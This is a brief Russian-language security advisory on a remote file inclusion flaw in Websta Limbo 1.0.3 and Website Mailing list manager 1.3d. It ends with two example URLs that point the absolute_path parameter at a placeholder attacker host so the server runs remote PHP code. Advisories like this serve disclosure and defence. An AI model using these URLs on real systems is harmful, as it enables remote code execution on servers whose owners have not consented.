Программа: Websta Limbo 1.0.3, Website Mailing list manager 1.3d

Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на уязвимой системе. Уязвимость
существует из-за некорректной обработки
входных данных в параметре absolute_path в
сценарии index2.php (Limbo) и сценарии inc/initdb.php (Website
Mailing list manager). Удаленный пользователь может с
помощью специально сформированного URL
выполнить произвольный php сценарий на
уязвимой системе с привилегиями web сервера.

Пример:

http://[target]/[limbo_dir]/index2.php?absolute_path=http://[attacker]
http://[target]/[mailing_dir]/ inc/initdb.php?absolute_path=http://[attacker]

Оставить мнение